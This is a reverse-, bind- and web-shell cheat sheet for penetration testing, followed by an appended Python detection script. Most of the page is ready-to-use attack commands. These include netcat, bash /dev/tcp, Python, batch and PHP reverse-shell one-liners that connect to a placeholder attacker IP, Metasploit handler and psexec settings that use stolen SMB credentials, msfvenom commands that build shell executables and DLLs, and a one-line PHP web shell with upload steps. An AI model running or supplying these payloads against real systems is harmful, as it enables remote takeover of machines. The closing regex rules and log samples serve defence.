Reverse vs Bind vs Web Shell
Bind Shell
The code is used to start a listener attached to a shell on the target. Then we can connect to the port to obtain remote code execution. This has the advantage of not requiring any configuration on our network, but may be prevented by firewalls protecting the target.
Reverse Shell
The code makes the target connect back to the attacker's computer. Reverse shells are a good way to bypass firewalls. The drawback is that we need to configure our network to accept the shell: we need to set up a handler.
Web Shell
The code allows the attacker to send shell commands to the target server via a web page hosted on this server.
Handlers
NETCAT
nc -lvnp [ATTACKER_PORT]
Open a listener on the selected port.
METASPLOIT
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
Handler for a Linux (ELF) reverse shell.
Reverse Shell
Resources
PayloadsAllTheThings Reverse Shell Cheat Sheet
Pentestmonkey Reverse Shell Cheat Sheet
NETCAT
nc -e /bin/bash [ATTACKER_IP] [ATTACKER_PORT]
Reverse shell.
BASH
bash -i >& /dev/tcp/[ATTACKER_IP]/[ATTACKER_PORT] 0>&1
Reverse shell.
BAT
@echo off
nc.exe [ATTACKER_IP] [ATTACKER_PORT] -e cmd.exe
Reverse shell.
PYTHON
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ATTACKER_IP]",[ATTACKER_PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Reverse shell.
PHP
<?php exec("/bin/bash -c 'bash -i > /dev/tcp/[ATTACKER_IP]/[ATTACKER_PORT] 0>&1'"); ?>
Very simple reverse shell.
Fancy reverse shell: Pentestmonkey PHP Reverse Shell
Location on Kali: /usr/share/webshells/php/php-reverse-shell.php
METASPLOIT
use exploit/windows/smb/psexec
set lhost [ATTACKER_IP]
set rhosts [TARGET_IP]
set smbdomain [TARGET_DOMAIN]
set smbuser [TARGET_USER]
set smbpass [TARGET_PASSWORD]
set payload windows/x64/meterpreter/reverse_tcp
Create a reverse shell from an SMB share.
MSFVENOM (Reverse Shell Generator)
msfvenom -p cmd/unix/reverse_netcat LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT]
Generate a Linux reverse shell.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a reverse shell exe.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a meterpreter reverse shell exe.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f dll -o shell.dll
Generate a meterpreter reverse shell DLL.
Web Shell
PHP
<?php system($_GET["cmd"]); ?>
Web shell. After upload, go to http://[TARGET_IP]/myWebShell.php?cmd=whoami
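Detection
Seen from the defender's side, the one-liners above leave recognizable process command lines and request URLs. The following is an added example, not part of the original cheat sheet, that matches those shapes in process telemetry and web access logs; the rule names, the SUSPECT_PARAMS set and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Rules for the one-liner shapes listed on this page (process command lines).
CMDLINE_RULES = {
    "bash-dev-tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "netcat-exec": re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s+\S+"),
    "python-socket-dup2": re.compile(r"socket\.socket\(.*os\.dup2\("),
}
SUSPECT_PARAMS = {"cmd"}  # assumption: the page only shows the "cmd" parameter
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_cmdline(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]

def scan_access_line(line):
    """Flag a web-shell style request: suspect parameter or shell one-liner in a value."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    hits = []
    for key, values in parse_qs(urlsplit(m.group(1)).query).items():
        if key.lower() in SUSPECT_PARAMS:
            hits.append("param:" + key.lower())
        for value in values:  # parse_qs has already URL-decoded the value
            hits += scan_cmdline(value)
    return hits

# Constructed samples using documentation address ranges, not real telemetry.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "nc -e /bin/bash 192.0.2.10 4444",
    "nc.exe 192.0.2.10 4444 -e cmd.exe",
    "python3 -c import socket,os;s=socket.socket(socket.AF_INET);os.dup2(s.fileno(),0)",
    "rsync -e ssh /srv/data backup@198.51.100.7:/data",  # benign use of -e
    "nc -zv 198.51.100.7 443",                            # benign port check
]
SAMPLE_ACCESS = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /myWebShell.php?cmd=whoami HTTP/1.1" 200 12',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /u.php?x=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.0.2.10%2F4444 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(scan_cmdline(line) or "clean", "|", line)
    for line in SAMPLE_ACCESS:
        print(scan_access_line(line) or "clean", "|", line)
```

String matching like this catches the unmodified cheat-sheet forms only; pair it with egress filtering and alerts on web server processes spawning shells.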